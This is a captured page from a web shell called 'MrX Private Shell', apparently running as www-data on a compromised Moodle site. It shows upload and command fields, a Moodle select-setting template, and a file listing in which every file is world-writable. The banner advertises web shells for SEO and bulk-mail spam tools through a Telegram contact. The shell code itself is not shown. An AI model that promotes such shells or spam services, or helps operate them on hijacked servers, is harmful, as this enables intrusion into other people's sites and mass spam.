__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/

    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core_admin/setting_configselect_optgroup

    Admin select with optgroup setting template.

    Context variables required for this template:
    * name - form element name
    * id - element id
    * readonly - bool
    * options - list of options (not grouped)
    * optgroups - list of options grouped containing the group label and for each option: name, value, selected

    Example context (json):
    {
        "name": "test",
        "id": "test0",
        "readonly": false,
        "options": [
            { "name": "Option 1", "value": "V", "selected": false },
            { "name": "Option 2", "value": "V", "selected": false }
        ],
        "optgroups": [
            {
                "label": "Group 1",
                "options": [
                    { "name": "Option 3", "value": "V", "selected": true },
                    { "name": "Option 4", "value": "V", "selected": false }
                ]
            },
            {
                "label": "Group 2",
                "options": [
                    { "name": "Option 5", "value": "V", "selected": false },
                    { "name": "Option 6", "value": "V", "selected": false }
                ]
            }
        ]
    }
}}
{{!
    Setting configselect with optgroup support.
}}
<div class="form-select defaultsnext">
    <select {{#readonly}}disabled{{/readonly}} id="{{id}}" name="{{name}}" class="custom-select">
        {{#options}}
            <option value="{{value}}" {{#selected}}selected{{/selected}}>{{name}}</option>
        {{/options}}
        {{#optgroups}}
            <optgroup label="{{label}}">
                {{#options}}
                    <option value="{{value}}" {{#selected}}selected{{/selected}}>{{name}}</option>
                {{/options}}
            </optgroup>
        {{/optgroups}}
    </select>
</div>



Filemanager

Name Type Size Permission Actions
local Folder 0777
table Folder 0777
themeselector Folder 0777
header_search_input.mustache File 1.88 KB 0777
setting.mustache File 3.47 KB 0777
setting_configcheckbox.mustache File 1.41 KB 0777
setting_configcolourpicker.mustache File 1.75 KB 0777
setting_configdirectory.mustache File 1.31 KB 0777
setting_configduration.mustache File 1.85 KB 0777
setting_configempty.mustache File 1.04 KB 0777
setting_configexecutable.mustache File 1.3 KB 0777
setting_configfile.mustache File 1.86 KB 0777
setting_configfilesize.mustache File 1.85 KB 0777
setting_confightmleditor.mustache File 1.21 KB 0777
setting_configmulticheckbox.mustache File 1.73 KB 0777
setting_configmultiselect.mustache File 1.69 KB 0777
setting_configmultiselect_optgroup.mustache File 2.64 KB 0777
setting_configpasswordunmask.mustache File 2.75 KB 0777
setting_configselect.mustache File 1.54 KB 0777
setting_configselect_optgroup.mustache File 2.49 KB 0777
setting_configtext.mustache File 2.03 KB 0777
setting_configtextarea.mustache File 1.48 KB 0777
setting_configtime.mustache File 2.26 KB 0777
setting_configtoggle.mustache File 1.93 KB 0777
setting_courselist_frontpage.mustache File 1.64 KB 0777
setting_description.mustache File 1.34 KB 0777
setting_devicedetectregex.mustache File 1.89 KB 0777
setting_emoticons.mustache File 2.16 KB 0777
setting_encryptedpassword.mustache File 2.33 KB 0777
setting_filetypes.mustache File 1.78 KB 0777
setting_flag.mustache File 1.23 KB 0777
setting_gradecat_combo.mustache File 1.63 KB 0777
setting_heading.mustache File 1.23 KB 0777
setting_manage_plugins.mustache File 3.9 KB 0777
setting_savebutton.mustache File 1023 B 0777
setting_special_calendar_weekend.mustache File 1.77 KB 0777
settings.mustache File 2 KB 0777
settings_search_results.mustache File 2.64 KB 0777
webservice_token_new.mustache File 1.72 KB 0777
Filemanager